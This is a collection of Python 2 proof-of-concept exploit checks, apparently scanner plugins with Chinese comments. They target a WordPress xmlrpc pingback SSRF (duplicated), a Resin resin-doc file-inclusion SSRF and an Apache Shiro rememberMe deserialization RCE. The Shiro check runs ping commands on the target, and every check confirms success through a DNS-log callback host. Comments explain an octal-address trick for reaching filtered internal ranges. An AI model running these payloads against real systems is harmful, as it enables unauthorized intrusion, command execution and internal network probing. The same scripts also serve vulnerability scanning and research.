def poc(url): if '://' not in url: url = 'http://' + url targeturl = url.rstrip('/') + "/xmlrpc.php" c = CloudEye() dst = c.getRandomDomain('wpssrf') # 第一个地址段为SSRF的目标地址,格式为(http[s]://IP|DOAMIN)[:(80|8080|443)]。 # 只能这三个端口,外网地址全通,内网地址被过滤,可用8进制突破10开头的地址段。 # 第二个地址段需要该站实际存在的文章地址,用?p=1自动适配。 payload = """ <?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://{target}/</string></value></param> <param><value><string>{victim}?p=1</string></value></param> </params> </methodCall>""".format(target=dst, victim=url.rstrip('/') + '/') header = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0', 'Content-Type': 'text/xml'} try: # 无法从回显判断 requests.post(targeturl, data=payload, headers=header, timeout=req_timeout) if c.verifyDNS(delay=3): return True except Exception, e: pass
def poc(url): url = url if '://' in url else 'http://' + url print iterate_path(url) for each in iterate_path(url): try: c = CloudEye() domain = c.getRandomDomain('resin') payload = '/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://%s' % domain target = each.rstrip('/') + payload requests.get(target, timeout=5) if c.verifyDNS(delay=3): return each except Exception: pass
def poc(url): if '://' not in url: target = 'https://%s' % url if ':443' in url else 'http://%s' % url else: target = url try: cloudeye = CloudEye() domain = cloudeye.getRandomDomain('shiro') # 设置dns特征域名组 rce_command = 'ping -n 3 %s || ping -c 3 %s' % (domain, domain) # 目标机执行的代码 payload = generator(rce_command, JAR_FILE) # 生成payload requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) # 发送验证请求 dnslog = cloudeye.getDnsRecord(delay=2) if domain in dnslog: msg = url for each in re.findall(r'client (.*)#', dnslog): # 获取出口ip msg += ' - ' + each return msg except Exception, e: pass
def poc(url): if '://' not in url: url = 'http://' + url targeturl = url.rstrip('/') + "/xmlrpc.php" c = CloudEye() dst = c.getRandomDomain('wpssrf') # 第一个地址段为SSRF的目标地址,格式为(http[s]://IP|DOAMIN)[:(80|8080|443)]。 # 只能这三个端口,外网地址全通,内网地址被过滤,可用8进制突破10开头的地址段。 # 第二个地址段需要该站实际存在的文章地址,用?p=1自动适配。 payload = """ <?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://{target}/</string></value></param> <param><value><string>{victim}?p=1</string></value></param> </params> </methodCall>""".format(target=dst, victim=url.rstrip('/') + '/') header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0', 'Content-Type': 'text/xml' } try: # 无法从回显判断 requests.post(targeturl, data=payload, headers=header, timeout=req_timeout) if c.verifyDNS(delay=3): return True except Exception, e: pass
#!/usr/bin/env python2.7 # -*- coding: utf-8 -*- """ Author: rivir Date: 2020/2/22 """ import sys sys.path.append('../') from plugin.cloudeye import CloudEye c = CloudEye() a = c.getRandomDomain('cdxy') try: requests.get('http://' + a, timeout=1) except Exception: pass print c.verifyDNS(delay=0) print c.verifyHTTP(delay=0) print c.getDnsRecord(delay=0) print c.getHttpRecord(delay=0) if __name__ == "__main__": main()